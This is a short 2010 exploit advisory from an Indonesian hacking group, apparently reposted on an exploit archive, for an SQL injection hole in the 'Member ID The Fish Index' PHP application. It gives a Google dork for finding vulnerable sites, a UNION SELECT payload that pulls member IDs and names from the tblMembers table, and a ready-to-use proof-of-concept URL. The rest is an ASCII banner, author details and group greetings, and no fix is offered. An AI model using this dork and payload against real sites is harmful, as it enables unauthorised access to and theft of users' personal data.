Member ID The Fish Index PHP SQL Injection Vulnerability
2010-06-03 16:03:13*************************************************************************
,
| ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . ,
| --- | | | | | |---' | | | |---' | | |
| `---' `---| `---' `---' ` `---' ` `---' `---`---
` `---'
*************************************************************************
[V] Member ID The Fish Index PHP SQL Injection Vulnerability
--==[ Author ]==--
[+] Author : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group : INDONESIAN CYBER
[+] Site : http://indonesian-cyber.org/
[+] Date : June, 3-2010 [INDONESIA]
*************************************************************************
--==[ Details ]==--
[+] Vulnerable : SQL Injection
[+] Google Dork : inurl:index.php?myPlantId=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Exploit :
[+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
[-] Remote SQLi p0c :
[+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
[V] Greetz :
SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (di FB koq curhat mlu sih koh :p)
blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.